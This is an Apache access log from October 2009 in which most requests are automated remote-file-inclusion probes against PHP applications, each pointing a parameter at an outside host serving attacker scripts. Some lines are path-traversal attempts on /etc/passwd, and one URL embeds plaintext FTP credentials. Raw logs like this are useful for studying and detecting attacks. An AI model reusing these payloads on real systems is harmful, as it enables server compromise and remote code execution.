114.4.8.14 - - [12/Oct/2009:06:45:46 -0400] "GET /logs/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:46 -0400] "GET /bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:46 -0400] "GET /logs/access_log.Q109091200%20%20/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
91.214.45.89 - - [12/Oct/2009:06:45:33 -0400] "GET /logs/access_log.Q109063000 HTTP/1.1" 200 5874408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
114.4.8.14 - - [12/Oct/2009:06:45:57 -0400] "GET /bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:57 -0400] "GET /logs/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:45:57 -0400] "GET /logs/access_log.Q109091200%20%20/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:46:52 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:46:52 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:46:52 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:47:23 -0400] "GET /logs/access_log.Q109091200/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Oct/2009:06:47:38 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:47:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:47:38 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [12/Oct/2009:06:48:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [12/Oct/2009:06:48:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:16 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:16 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:16 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:48:31 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:48:31 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:48:31 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:34 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:34 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:34 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.4.8.14 - - [12/Oct/2009:06:48:39 -0400] "GET /logs/access_log.Q109091200/bbs/data/dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:06:48:41 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:06:48:44 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21525 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Oct/2009:06:48:53 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:48:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:48:53 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.185.129.36 - - [12/Oct/2009:06:48:59 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:59 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:48:59 -0400] "GET /logs/access_log.Q109063000%20%20//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:49:01 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:49:01 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:49:01 -0400] "GET /logs/access_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.241.32.194 - - [12/Oct/2009:06:49:04 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:49:06 -0400] "GET /logs/access_log.Q109052500//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:06:49:14 -0400] "GET /logs/access_log.Q109080200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.219.245.149 - - [12/Oct/2009:06:49:16 -0400] "GET /logs/access_log.Q109052300//?_zb_parh=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:49:35 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:49:53 -0400] "GET /logs/error_log.Q109063000//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:50:13 -0400] "GET /logs//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:50:13 -0400] "GET /logs/access_log.Q109063000%20%20//ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
203.185.129.36 - - [12/Oct/2009:06:50:13 -0400] "GET //ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:50:28 -0400] "GET /logs/error_log.Q109072400//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:50:28 -0400] "GET /logs/access_log.Q109070700//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:51:44 -0400] "GET //ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:51:52 -0400] "GET /logs//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Oct/2009:06:51:52 -0400] "GET /logs/access_log.Q109063000//ask_password.php?dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:06:53:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.114 - - [12/Oct/2009:06:53:26 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.92.23.89 - - [12/Oct/2009:06:53:30 -0400] "GET /logs/error_log.Q109062900//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.813"
212.92.23.89 - - [12/Oct/2009:06:53:30 -0400] "GET /logs/error_log.Q109051300//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.813"
72.30.79.114 - - [12/Oct/2009:06:53:26 -0400] "GET /logs/error_log.Q109072200 HTTP/1.0" 200 2561190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.114 - - [12/Oct/2009:06:53:33 -0400] "GET /logs/error_log.Q109072200 HTTP/1.0" 200 2561190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.174.72.82 - - [12/Oct/2009:06:54:15 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
79.174.72.82 - - [12/Oct/2009:06:54:15 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.158.181.12 - - [12/Oct/2009:06:54:16 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 264 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
85.158.181.12 - - [12/Oct/2009:06:54:16 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 269 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
222.97.189.33 - - [12/Oct/2009:06:54:17 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
222.97.189.33 - - [12/Oct/2009:06:54:17 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 264 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
172.16.1.180 - - [12/Oct/2009:06:54:19 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:54:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:54:19 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
93.174.0.17 - - [12/Oct/2009:06:54:29 -0400] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:29 -0400] "GET /logs/access_log.Q109093000/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:29 -0400] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:32 -0400] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:32 -0400] "GET /logs/access_log.Q109093000/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:32 -0400] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /logs/access_log.Q109093000/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /logs/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:33 -0400] "GET /logs/access_log.Q109093000/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:35 -0400] "GET /logs/access_log.Q109080300/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:37 -0400] "GET /logs/access_log.Q109080300/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:40 -0400] "GET /logs/access_log.Q109080300/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [12/Oct/2009:06:54:46 -0400] "GET /logs/access_log.Q109080300/webanalyse/words.php?action=delNoise&word=to//faqsupport/samplefaqsupport.php?path[docroot]=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.206.120.162 - - [12/Oct/2009:06:54:50 -0400] "GET /logs/error_log.Q109100300//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.ciasoftwares.com/fxid1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
172.16.1.180 - - [12/Oct/2009:06:55:22 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:55:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:55:22 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
203.185.129.36 - - [12/Oct/2009:06:55:55 -0400] "GET /logs//atom.php5?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
203.185.129.36 - - [12/Oct/2009:06:55:55 -0400] "GET //atom.php5?page=/../../../../../../../../etc/passwd HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
172.16.1.180 - - [12/Oct/2009:06:56:58 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:56:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:56:58 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
62.149.232.141 - - [12/Oct/2009:06:57:03 -0400] "GET /logs/error_log.Q109060400//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
62.149.232.141 - - [12/Oct/2009:06:57:03 -0400] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
62.149.232.141 - - [12/Oct/2009:06:57:03 -0400] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
168.143.19.89 - - [12/Oct/2009:06:57:28 -0400] "GET /logs/access_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.825"
168.143.19.89 - - [12/Oct/2009:06:57:31 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
168.143.19.89 - - [12/Oct/2009:06:57:31 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 231 "-" "libwww-perl/5.825"
209.59.12.99 - - [12/Oct/2009:06:58:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
168.143.19.89 - - [12/Oct/2009:06:58:28 -0400] "GET /logs/error_log.Q109071900/addons/guildbank/searcharrays.php?addonDir=ftp://michigan:mifruit103011@74.52.244.86/public_html/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.825"
172.16.1.180 - - [12/Oct/2009:06:59:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:59:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:06:59:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
195.248.63.115 - - [12/Oct/2009:06:59:48 -0400] "GET /logs/error_log.Q109062100//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
195.248.63.115 - - [12/Oct/2009:07:00:17 -0400] "GET /logs/access_log.Q109062100//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://maxi-rallye.be/joomla/zipimport/themza_j15_02/html/.../sistem.txt??? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
172.16.1.180 - - [12/Oct/2009:07:00:32 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:07:00:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [12/Oct/2009:07:00:32 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.30.79.114 - - [12/Oct/2009:07:00:36 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.114 - - [12/Oct/2009:07:00:36 -0400] "GET /logs/access_log.Q109071300 HTTP/1.0" 200 4718643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.12.13.152 - - [12/Oct/2009:07:01:29 -0400] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:07:01:29 -0400] "GET /logs/access_log.Q109070800/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:07:01:29 -0400] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:07:01:32 -0400] "GET /logs/access_log.Q109051500/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:07:02:11 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:07:02:11 -0400] "GET /logs/access_log.Q109063000//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.225.246.18 - - [12/Oct/2009:07:02:13 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:07:03:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.225.246.18 - - [12/Oct/2009:07:03:46 -0400] "GET /logs/access_log.Q109080500//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mismaquinas.com/nueva//banners/baner.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:07:04:11 -0400] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:07:04:11 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:07:04:11 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:07:04:12 -0400] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
